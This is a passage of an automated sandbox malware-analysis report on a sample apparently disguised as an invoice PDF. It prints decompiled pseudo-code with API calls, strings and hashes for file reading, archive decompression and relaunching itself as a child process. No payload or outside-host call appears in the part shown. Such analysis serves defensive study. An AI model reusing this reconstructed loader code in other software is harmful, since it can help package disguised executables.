                            									_t223 = _v16;
                            									L21:
                            									_t241 = 0;
                            									_v40 = _t163;
                            									_t215 =  *((intOrPtr*)(0x1346108 + _v20 * 4));
                            									_v36 = _t215;
                            									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
                            									_t216 = _a4;
                            									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
                            										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
                            										_v6 = _t218;
                            										__eflags = _t218 - 0xa;
                            										_t216 = _a4;
                            										if(_t218 != 0xa) {
                            											__eflags = _t223;
                            											if(_t223 != 0) {
                            												_t241 = _v24;
                            												 *_t163 = _v6;
                            												_t216 = _a4;
                            												_t232 = _t223 - 1;
                            												__eflags = _v5;
                            												_v12 = _t163 + 1;
                            												_v16 = _t232;
                            												 *((char*)(_t235 +  *((intOrPtr*)(0x1346108 + _v20 * 4)) + 0x2a)) = 0xa;
                            												if(_v5 != 0) {
                            													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x1346108 + _v20 * 4)) + 0x2b));
                            													_v6 = _t191;
                            													__eflags = _t191 - 0xa;
                            													if(_t191 != 0xa) {
                            														__eflags = _t232;
                            														if(_t232 != 0) {
                            															_t192 = _v12;
                            															_t241 = 2;
                            															 *_t192 = _v6;
                            															_t216 = _a4;
                            															_t233 = _t232 - 1;
                            															_v12 = _t192 + 1;
                            															_v16 = _t233;
                            															 *((char*)(_t235 +  *((intOrPtr*)(0x1346108 + _v20 * 4)) + 0x2b)) = 0xa;
                            															__eflags = _v5 - _v24;
                            															if(_v5 == _v24) {
                            																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x1346108 + _v20 * 4)) + 0x2c));
                            																_v6 = _t199;
                            																__eflags = _t199 - 0xa;
                            																if(_t199 != 0xa) {
                            																	__eflags = _t233;
                            																	if(_t233 != 0) {
                            																		_t200 = _v12;
                            																		_t241 = 3;
                            																		 *_t200 = _v6;
                            																		_t216 = _a4;
                            																		_t234 = _t233 - 1;
                            																		__eflags = _t234;
                            																		_v12 = _t200 + 1;
                            																		_v16 = _t234;
                            																		 *((char*)(_t235 +  *((intOrPtr*)(0x1346108 + _v20 * 4)) + 0x2c)) = 0xa;
                            																	}
                            																}
                            															}
                            														}
                            													}
                            												}
                            											}
                            										}
                            									}
                            									_t164 = E01328D71(_t216);
                            									__eflags = _t164;
                            									if(_t164 == 0) {
                            										L41:
                            										_v24 = 0;
                            										L42:
                            										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0); // executed
                            										__eflags = _t167;
                            										if(_t167 == 0) {
                            											L53:
                            											_t168 = GetLastError();
                            											_t241 = 5;
                            											__eflags = _t168 - _t241;
                            											if(_t168 != _t241) {
                            												__eflags = _t168 - 0x6d;
                            												if(_t168 != 0x6d) {
                            													L37:
                            													E0131C998(_t168);
                            													goto L38;
                            												}
                            												_t242 = 0;
                            												goto L39;
                            											}
                            											 *((intOrPtr*)(E0131C9CE())) = 9;
                            											 *(E0131C9BB()) = _t241;
                            											goto L38;
                            										}
                            										_t229 = _a12;
                            										__eflags = _v36 - _t229;
                            										if(_v36 > _t229) {
                            											goto L53;
                            										}
                            										_t242 = _t241 + _v36;
                            										__eflags = _t242;
                            										L45:
                            										_t237 = _v28;
                            										_t175 =  *((intOrPtr*)(0x1346108 + _v20 * 4));
                            										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
                            										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
                            											__eflags = _v5 - 2;
                            											if(_v5 == 2) {
                            												__eflags = _v24;
                            												_push(_t242 >> 1);
                            												_push(_v40);
                            												_push(_t216);
                            												if(_v24 == 0) {
                            													_t176 = E01321C82();
                            												} else {
                            													_t176 = E01321F94();
                            												}
                            											} else {
                            												_t230 = _t229 >> 1;
                            												__eflags = _t229 >> 1;
                            												_t176 = E01321E42(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
                            											}
                            											_t242 = _t176;
                            										}
                            										goto L39;
                            									}
                            									_t104 =  &_v28; // 0xa
                            									_t231 =  *_t104;
                            									_t178 =  *((intOrPtr*)(0x1346108 + _v20 * 4));
                            									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
                            									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
                            										goto L41;
                            									}
                            									_t180 = GetConsoleMode(_v32,  &_v44);
                            									__eflags = _t180;
                            									if(_t180 == 0) {
                            										goto L41;
                            									}
                            									__eflags = _v5 - 2;
                            									if(_v5 != 2) {
                            										goto L42;
                            									}
                            									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
                            									__eflags = _t184;
                            									if(_t184 != 0) {
                            										_t229 = _a12;
                            										_t242 = _t241 + _v36 * 2;
                            										goto L45;
                            									}
                            									_t168 = GetLastError();
                            									goto L37;
                            								} else {
                            									 *((intOrPtr*)(E0131C9CE())) = 0xc;
                            									 *(E0131C9BB()) = 8;
                            									L38:
                            									_t242 = _t241 | 0xffffffff;
                            									__eflags = _t242;
                            									L39:
                            									E013209EB(_t246);
                            									return _t242;
                            								}
                            							}
                            							L15:
                            							 *(E0131C9BB()) =  *_t206 & _t246;
                            							 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            							E01321788();
                            							goto L38;
                            						}
                            						__eflags = _t155 != 1;
                            						if(_t155 != 1) {
                            							L13:
                            							_t163 = _a8;
                            							_v16 = _t223;
                            							_v12 = _t163;
                            							goto L21;
                            						}
                            						_t211 =  !_t223;
                            						__eflags = _t211 & 0x00000001;
                            						if((_t211 & 0x00000001) == 0) {
                            							goto L15;
                            						}
                            						goto L13;
                            					}
                            					L6:
                            					 *(E0131C9BB()) =  *_t151 & 0x00000000;
                            					 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            					goto L59;
                            				} else {
                            					 *(E0131C9BB()) =  *_t212 & 0x00000000;
                            					_t145 = E0131C9CE();
                            					 *_t145 = 9;
                            					L60:
                            					return _t145 | 0xffffffff;
                            				}
                            			}

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3907804496
                            • Opcode ID: 2f2b25abc29c9321f4b1ced9773de6062cb31f221b2110c8870f0fe023680d45
                            • Instruction ID: f737d7feebc91e03a62f3857952f2b1c5323acdf44f7e709eedeafb4a9c49f8a
                            • Opcode Fuzzy Hash: 2f2b25abc29c9321f4b1ced9773de6062cb31f221b2110c8870f0fe023680d45
                            • Instruction Fuzzy Hash: 0FC1D474D0426AAFDF15EFADDC40BAEBBB4AF1A308F044185EA51A7382C7749941CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 147 132bd1f-132bd4f call 132baf3 150 132bd51-132bd5c call 131c9bb 147->150 151 132bd6a-132bd76 call 131e783 147->151 156 132bd5e-132bd65 call 131c9ce 150->156 157 132bd78-132bd8d call 131c9bb call 131c9ce 151->157 158 132bd8f-132bdd8 call 132ba5e 151->158 167 132c041-132c047 156->167 157->156 165 132be45-132be4e GetFileType 158->165 166 132bdda-132bde3 158->166 171 132be50-132be81 GetLastError call 131c998 CloseHandle 165->171 172 132be97-132be9a 165->172 169 132bde5-132bde9 166->169 170 132be1a-132be40 GetLastError call 131c998 166->170 169->170 176 132bdeb-132be18 call 132ba5e 169->176 170->156 171->156 186 132be87-132be92 call 131c9ce 171->186 174 132bea3-132bea9 172->174 175 132be9c-132bea1 172->175 179 132bead-132befb call 131e6cc 174->179 180 132beab 174->180 175->179 176->165 176->170 189 132bf0b-132bf2f call 132b811 179->189 190 132befd-132bf09 call 132bc6f 179->190 180->179 186->156 197 132bf42-132bf85 189->197 198 132bf31 189->198 190->189 196 132bf33-132bf3d call 13218f4 190->196 196->167 199 132bfa6-132bfb4 197->199 200 132bf87-132bf8b 197->200 198->196 203 132bfba-132bfbe 199->203 204 132c03f 199->204 200->199 202 132bf8d-132bfa1 200->202 202->199 203->204 206 132bfc0-132bff3 CloseHandle call 132ba5e 203->206 204->167 209 132c027-132c03b 206->209 210 132bff5-132c021 GetLastError call 131c998 call 131e895 206->210 209->204 210->209
                            C-Code - Quality: 42%
                            			E0132BD1F(void* __ecx, void* __edx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                            				signed int _v5;
                            				char _v6;
                            				void* _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				char _v24;
                            				intOrPtr _v36;
                            				signed int _v44;
                            				void _v48;
                            				char _v72;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed int _t114;
                            				void* _t122;
                            				signed int _t123;
                            				signed char _t124;
                            				signed int _t134;
                            				intOrPtr _t164;
                            				intOrPtr _t180;
                            				signed int* _t190;
                            				signed int _t192;
                            				char _t197;
                            				signed int _t203;
                            				signed int _t206;
                            				signed int _t215;
                            				signed int _t217;
                            				signed int _t219;
                            				signed int _t225;
                            				signed int _t227;
                            				signed int _t234;
                            				signed int _t235;
                            				signed int _t237;
                            				signed int _t239;
                            				void* _t240;
                            				signed char _t243;
                            				intOrPtr _t246;
                            				void* _t249;
                            				void* _t253;
                            				void* _t263;
                            				signed int _t264;
                            				signed int _t267;
                            				signed int _t270;
                            				signed int _t271;
                            				void* _t273;
                            				void* _t275;
                            				void* _t276;
                            				void* _t278;
                            				void* _t279;
                            				void* _t281;
                            				void* _t285;
                            
                            				_t240 = __edx;
                            				_t263 = E0132BAF3(__ecx,  &_v72, _a16, _a20, _a24);
                            				_t192 = 6;
                            				memcpy( &_v48, _t263, _t192 << 2);
                            				_t275 = _t273 + 0x1c;
                            				_t249 = _t263 + _t192 + _t192;
                            				_t264 = _t263 | 0xffffffff;
                            				if(_v36 != _t264) {
                            					_t114 = E0131E783(_t240, _t249, _t264, __eflags);
                            					_t190 = _a8;
                            					 *_t190 = _t114;
                            					__eflags = _t114 - _t264;
                            					if(_t114 != _t264) {
                            						_v20 = _v20 & 0x00000000;
                            						_v24 = 0xc;
                            						_t276 = _t275 - 0x18;
                            						 *_a4 = 1;
                            						_push(6);
                            						_v16 =  !(_a16 >> 7) & 1;
                            						_push( &_v24);
                            						_push(_a12);
                            						memcpy(_t276,  &_v48, 1 << 2);
                            						_t197 = 0;
                            						_t122 = E0132BA5E(); // executed
                            						_t253 = _t122;
                            						_t278 = _t276 + 0x2c;
                            						_v12 = _t253;
                            						__eflags = _t253 - 0xffffffff;
                            						if(_t253 != 0xffffffff) {
                            							L11:
                            							_t123 = GetFileType(_t253); // executed
                            							__eflags = _t123;
                            							if(_t123 != 0) {
                            								__eflags = _t123 - 2;
                            								if(_t123 != 2) {
                            									__eflags = _t123 - 3;
                            									_t124 = _v48;
                            									if(_t123 == 3) {
                            										_t124 = _t124 | 0x00000008;
                            										__eflags = _t124;
                            									}
                            								} else {
                            									_t124 = _v48 | 0x00000040;
                            								}
                            								_v5 = _t124;
                            								E0131E6CC(_t197,  *_t190, _t253);
                            								_t243 = _v5 | 0x00000001;
                            								_v5 = _t243;
                            								_v48 = _t243;
                            								 *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t243;
                            								_t203 =  *_t190;
                            								_t205 = (_t203 & 0x0000003f) * 0x30;
                            								__eflags = _a16 & 0x00000002;
                            								 *((char*)( *((intOrPtr*)(0x1346108 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
                            								if((_a16 & 0x00000002) == 0) {
                            									L20:
                            									_v6 = 0;
                            									_push( &_v6);
                            									_push(_a16);
                            									_t279 = _t278 - 0x18;
                            									_t206 = 6;
                            									_push( *_t190);
                            									memcpy(_t279,  &_v48, _t206 << 2);
                            									_t134 = E0132B811(_t190,  &_v48 + _t206 + _t206,  &_v48);
                            									_t281 = _t279 + 0x30;
                            									__eflags = _t134;
                            									if(__eflags == 0) {
                            										 *((char*)( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
                            										 *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
                            										__eflags = _v5 & 0x00000048;
                            										if((_v5 & 0x00000048) == 0) {
                            											__eflags = _a16 & 0x00000008;
                            											if((_a16 & 0x00000008) != 0) {
                            												_t225 =  *_t190;
                            												_t227 = (_t225 & 0x0000003f) * 0x30;
                            												_t164 =  *((intOrPtr*)(0x1346108 + (_t225 >> 6) * 4));
                            												_t87 = _t164 + _t227 + 0x28;
                            												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
                            												__eflags =  *_t87;
                            											}
                            										}
                            										_t267 = _v44;
                            										__eflags = (_t267 & 0xc0000000) - 0xc0000000;
                            										if((_t267 & 0xc0000000) != 0xc0000000) {
                            											L31:
                            											__eflags = 0;
                            											return 0;
                            										} else {
                            											__eflags = _a16 & 0x00000001;
                            											if((_a16 & 0x00000001) == 0) {
                            												goto L31;
                            											}
                            											CloseHandle(_v12);
                            											_v44 = _t267 & 0x7fffffff;
                            											_t215 = 6;
                            											_push( &_v24);
                            											_push(_a12);
                            											memcpy(_t281 - 0x18,  &_v48, _t215 << 2);
                            											_t246 = E0132BA5E();
                            											__eflags = _t246 - 0xffffffff;
                            											if(_t246 != 0xffffffff) {
                            												_t217 =  *_t190;
                            												_t219 = (_t217 & 0x0000003f) * 0x30;
                            												__eflags = _t219;
                            												 *((intOrPtr*)( *((intOrPtr*)(0x1346108 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t246;
                            												goto L31;
                            											}
                            											E0131C998(GetLastError());
                            											 *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                            											E0131E895( *_t190);
                            											L10:
                            											goto L2;
                            										}
                            									}
                            									_t270 = _t134;
                            									goto L22;
                            								} else {
                            									_t270 = E0132BC6F(_t205,  *_t190);
                            									__eflags = _t270;
                            									if(__eflags != 0) {
                            										L22:
                            										E013218F4(__eflags,  *_t190);
                            										return _t270;
                            									}
                            									goto L20;
                            								}
                            							}
                            							_t271 = GetLastError();
                            							E0131C998(_t271);
                            							 *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                            							CloseHandle(_t253);
                            							__eflags = _t271;
                            							if(_t271 == 0) {
                            								 *((intOrPtr*)(E0131C9CE())) = 0xd;
                            							}
                            							goto L2;
                            						}
                            						_t234 = _v44;
                            						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
                            						if((_t234 & 0xc0000000) != 0xc0000000) {
                            							L9:
                            							_t235 =  *_t190;
                            							_t237 = (_t235 & 0x0000003f) * 0x30;
                            							_t180 =  *((intOrPtr*)(0x1346108 + (_t235 >> 6) * 4));
                            							_t33 = _t180 + _t237 + 0x28;
                            							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
                            							__eflags =  *_t33;
                            							E0131C998(GetLastError());
                            							goto L10;
                            						}
                            						__eflags = _a16 & 0x00000001;
                            						if((_a16 & 0x00000001) == 0) {
                            							goto L9;
                            						}
                            						_t285 = _t278 - 0x18;
                            						_v44 = _t234 & 0x7fffffff;
                            						_t239 = 6;
                            						_push( &_v24);
                            						_push(_a12);
                            						memcpy(_t285,  &_v48, _t239 << 2);
                            						_t197 = 0;
                            						_t253 = E0132BA5E();
                            						_t278 = _t285 + 0x2c;
                            						_v12 = _t253;
                            						__eflags = _t253 - 0xffffffff;
                            						if(_t253 != 0xffffffff) {
                            							goto L11;
                            						}
                            						goto L9;
                            					} else {
                            						 *(E0131C9BB()) =  *_t186 & 0x00000000;
                            						 *_t190 = _t264;
                            						 *((intOrPtr*)(E0131C9CE())) = 0x18;
                            						goto L2;
                            					}
                            				} else {
                            					 *(E0131C9BB()) =  *_t188 & 0x00000000;
                            					 *_a8 = _t264;
                            					L2:
                            					return  *((intOrPtr*)(E0131C9CE()));
                            				}
                            			}
                            0x0132bd5c
                            0x0132bd5e
                            0x00000000
                            0x0132bd63

                            APIs
                              • Part of subcall function 0132BA5E: CreateFileW.KERNELBASE(00000000,00000000,?,0132BDC8,?,?,00000000,?,0132BDC8,00000000,0000000C), ref: 0132BA7B
                            • GetLastError.KERNEL32 ref: 0132BE33
                            • __dosmaperr.LIBCMT ref: 0132BE3A
                            • GetFileType.KERNELBASE(00000000), ref: 0132BE46
                            • GetLastError.KERNEL32 ref: 0132BE50
                            • __dosmaperr.LIBCMT ref: 0132BE59
                            • CloseHandle.KERNEL32(00000000), ref: 0132BE79
                            • CloseHandle.KERNEL32(?), ref: 0132BFC3
                            • GetLastError.KERNEL32 ref: 0132BFF5
                            • __dosmaperr.LIBCMT ref: 0132BFFC
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                            • String ID: H
                            • API String ID: 4237864984-2852464175
                            • Opcode ID: dc651ec72f7eaf4dbbe537990d22d853d8ef71cc8d3e3ce636bb71717a8d65cb
                            • Instruction ID: 1677a5719b423ada13280ea3b751034c7d546d6b5266aea8b311a38d52ffd5a3
                            • Opcode Fuzzy Hash: dc651ec72f7eaf4dbbe537990d22d853d8ef71cc8d3e3ce636bb71717a8d65cb
                            • Instruction Fuzzy Hash: F0A15632A041299FDF2DEF7CD881BADBBA5AB06328F140159E815DF396DB359802CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 56%
                            			E01311220(void* __ecx, void* __edx) {
                            				void* __ebx;
                            				void* __ebp;
                            				intOrPtr _t10;
                            				void* _t12;
                            				intOrPtr _t13;
                            				void* _t14;
                            				intOrPtr _t15;
                            				intOrPtr _t32;
                            				void* _t37;
                            				void* _t38;
                            				intOrPtr* _t39;
                            				intOrPtr _t41;
                            				intOrPtr _t44;
                            				void* _t49;
                            				void* _t51;
                            				void* _t52;
                            
                            				_t38 = __edx;
                            				_t37 = __ecx;
                            				_t39 =  *((intOrPtr*)(_t49 + 8));
                            				if( *_t39 != 0) {
                            					L3:
                            					_t44 =  *((intOrPtr*)(_t49 + 0x14));
                            					_push(0);
                            					L01317864();
                            					_t12 = E01319F16(_t38,  *_t39, _t10 +  *((intOrPtr*)(_t39 + 4)),  *((intOrPtr*)(_t44 + 4))); // executed
                            					_push( *((intOrPtr*)(_t44 + 8)));
                            					L01317864();
                            					_push(_t12); // executed
                            					_t13 = E01319808(_t37); // executed
                            					_t32 = _t13;
                            					_t51 = _t49 + 0x10;
                            					__eflags = _t32;
                            					if(__eflags != 0) {
                            						_push( *_t39);
                            						L01317864();
                            						_t14 = E01319B2B(_t32, _t13,  *((intOrPtr*)(_t44 + 8)), 1); // executed
                            						_t52 = _t51 + 0x10;
                            						__eflags = _t14 - 1;
                            						if(__eflags >= 0) {
                            							__eflags =  *((char*)(_t44 + 0x10)) - 1;
                            							if(__eflags != 0) {
                            								L10:
                            								_t15 =  *_t39;
                            								__eflags = _t15;
                            								if(__eflags != 0) {
                            									_push(_t15); // executed
                            									E01319889(_t37, _t38, __eflags); // executed
                            									 *_t39 = 0;
                            								}
                            								return _t32;
                            							} else {
                            								_push(_t44);
                            								_t41 = E01311030(_t14, _t32, _t37, __eflags, _t32); // executed
                            								L01319803(_t32); // executed
                            								_t52 = _t52 + 0xc;
                            								_t32 = _t41;
                            								__eflags = _t41;
                            								if(__eflags != 0) {
                            									goto L10;
                            								} else {
                            									E01311980(__eflags, "Error decompressing %s\n", _t44 + 0x12);
                            									__eflags = 0;
                            									return 0;
                            								}
                            							}
                            						} else {
                            							_push("Could not read from file\n");
                            							E01311980(__eflags);
                            							L01319803(_t32);
                            							__eflags = 0;
                            							return 0;
                            						}
                            					} else {
                            						_push("Could not allocate read buffer\n");
                            						E01311980(__eflags);
                            						__eflags = 0;
                            						return 0;
                            					}
                            				} else {
                            					_t10 = E013128C0(_t39 + 0x68, "rb");
                            					_t49 = _t49 + 8;
                            					 *_t39 = _t10;
                            					_t59 = _t10;
                            					if(_t10 != 0) {
                            						goto L3;
                            					} else {
                            						_push("Cannot open archive file\n");
                            						E01311980(_t59);
                            						return 0;
                            					}
                            				}
                            			}

                            APIs
                            Strings
                            • Could not read from file, xrefs: 013112B5
                            • Cannot open archive file, xrefs: 01311241
                            • Could not allocate read buffer, xrefs: 01311287
                            • Error decompressing %s, xrefs: 013112F2
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: htonl$__fread_nolock
                            • String ID: Cannot open archive file$Could not allocate read buffer$Could not read from file$Error decompressing %s
                            • API String ID: 3757756281-3387914768
                            • Opcode ID: e3d829030e36bba0416516398587ddba22cbb1e22685ef1d5b08d39de415ebef
                            • Instruction ID: f77e0b07d89179bdd72eeec44cccbfde91d9a02c9d2a01d116a45d443ecc958d
                            • Opcode Fuzzy Hash: e3d829030e36bba0416516398587ddba22cbb1e22685ef1d5b08d39de415ebef
                            • Instruction Fuzzy Hash: 9521D8F2A003067AEB187A7DBC41BDEBB89AF6115DF540531FE04D120EF762D56083A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 62%
                            			E01314400(void* __edx, void* __ebp, void* __eflags, struct _SECURITY_ATTRIBUTES _a4, struct _SECURITY_ATTRIBUTES* _a8, int _a12, struct _PROCESS_INFORMATION _a16, struct _STARTUPINFOW _a32, struct _SECURITY_ATTRIBUTES* _a36, struct _SECURITY_ATTRIBUTES* _a40, struct _SECURITY_ATTRIBUTES* _a44, intOrPtr _a76, short _a80, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, short _a100, signed int _a8292, intOrPtr _a8300) {
                            				struct _SECURITY_ATTRIBUTES* _v0;
                            				signed int _t26;
                            				intOrPtr _t45;
                            				int _t51;
                            				signed int _t53;
                            				signed int _t64;
                            				DWORD* _t66;
                            				void* _t70;
                            
                            				_t70 = __eflags;
                            				_t62 = __edx;
                            				E01317880();
                            				_t26 =  *0x133c008; // 0xa3433343
                            				_a8292 = _t26 ^ _t64;
                            				_v0 = 0;
                            				E01314BF0( &_a100, _a8300, 0x1000);
                            				_push(1);
                            				_push(0x16);
                            				E0131EDBE(__edx, _t70);
                            				_push(1);
                            				_push(2); // executed
                            				E0131EDBE(__edx, _t70); // executed
                            				_push(1);
                            				_push(0xf);
                            				E0131EDBE(__edx, _t70);
                            				_push(1);
                            				_push(0x15);
                            				E0131EDBE(_t62, _t70);
                            				_a4.nLength = 0xc;
                            				_a8 = 0;
                            				_a12 = 1;
                            				GetStartupInfoW( &_a32);
                            				_a36 = 0;
                            				_a40 = 0;
                            				_a44 = 0;
                            				_a76 = 0x101;
                            				_a80 = 1;
                            				_a88 = E0131E926(E013209C5(E0131A7EB(0)));
                            				_a92 = E0131E926(E013209C5(E0131A7EB(1)));
                            				_t45 = E0131E926(E013209C5(E0131A7EB(2)));
                            				_t66 = _t64 + 0x50;
                            				_a96 = _t45;
                            				_t51 = CreateProcessW( &_a100, GetCommandLineW(),  &_a4, 0, 1, 0, 0, 0,  &_a32,  &_a16); // executed
                            				if(_t51 == 0) {
                            					_push("Error creating child process!\n");
                            					_push("CreateProcessW");
                            					_t53 = E01311860(_t62, __eflags) | 0xffffffff;
                            					__eflags = _t53;
                            					E0131786A();
                            					return _t53;
                            				} else {
                            					WaitForSingleObject(_a16.hProcess, 0xffffffff);
                            					GetExitCodeProcess(_a16, _t66);
                            					E0131786A();
                            					return _v0;
                            				}
                            			}

                            APIs
                              • Part of subcall function 01314BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,01314117,?,?,00001000), ref: 01314C08
                              • Part of subcall function 0131EDBE: SetConsoleCtrlHandler.KERNELBASE(0131EA12,00000001,0133A620,00000018,01314440,00000016,00000001,?,?,00001000,013126B4,?,00000000), ref: 0131EED7
                              • Part of subcall function 0131EDBE: GetLastError.KERNEL32 ref: 0131EEF1
                            • GetStartupInfoW.KERNEL32(?), ref: 0131447B
                            • GetCommandLineW.KERNEL32(?,00000000,00000001,00000000,00000000,00000000,?,?), ref: 0131450C
                            • CreateProcessW.KERNELBASE ref: 0131451B
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0131452B
                            • GetExitCodeProcess.KERNEL32 ref: 01314539
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Process$ByteCharCodeCommandConsoleCreateCtrlErrorExitHandlerInfoLastLineMultiObjectSingleStartupWaitWide
                            • String ID: CreateProcessW$Error creating child process!
                            • API String ID: 1248179626-3524285272
                            • Opcode ID: ad975629ca2f809ac6875a8a5ed864af36c304958dde003ece2e8ccd45cc4232
                            • Instruction ID: 704bdd1a0a04bcccce030a883fd89d491b60972c8002e2a6817eb0aaaaccf1b2
                            • Opcode Fuzzy Hash: ad975629ca2f809ac6875a8a5ed864af36c304958dde003ece2e8ccd45cc4232
                            • Instruction Fuzzy Hash: C9319670504345ABE724AB78CC4EF8FB6E8AF54708F004919F985A72C4DBB9D144CB56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 50%
                            			E01311030(void* __eax, void* __ebx, void* __ecx, void* __eflags, intOrPtr _a8) {
                            				intOrPtr _v0;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				intOrPtr _v44;
                            				intOrPtr _v52;
                            				intOrPtr _v60;
                            				char _v68;
                            				intOrPtr _t19;
                            				intOrPtr _t20;
                            				intOrPtr _t36;
                            				intOrPtr _t37;
                            
                            				_t36 = _a8;
                            				_push( *((intOrPtr*)(_t36 + 0xc)));
                            				L01317864();
                            				_t19 = E01319808(__ecx); // executed
                            				_t37 = _t19;
                            				_t47 = _t37;
                            				if(_t37 != 0) {
                            					_t20 = _v0;
                            					_push( *((intOrPtr*)(_t36 + 8)));
                            					_v28 = 0;
                            					_v24 = 0;
                            					_v20 = 0;
                            					_v60 = _t20;
                            					L01317864();
                            					_push( *((intOrPtr*)(_t36 + 0xc)));
                            					_v60 = _t20;
                            					_v52 = _t37;
                            					L01317864();
                            					_v52 = _t20;
                            					__eflags = E01316720( &_v68, "1.2.11", 0x38);
                            					if(__eflags < 0) {
                            						_push(_v44);
                            						E01311980(__eflags, "Error %d from inflateInit: %s\n", _t22);
                            						__eflags = 0;
                            						return 0;
                            					} else {
                            						_push(4);
                            						_push( &_v68);
                            						__eflags = E01314E60();
                            						if(__eflags < 0) {
                            							_push(_v44);
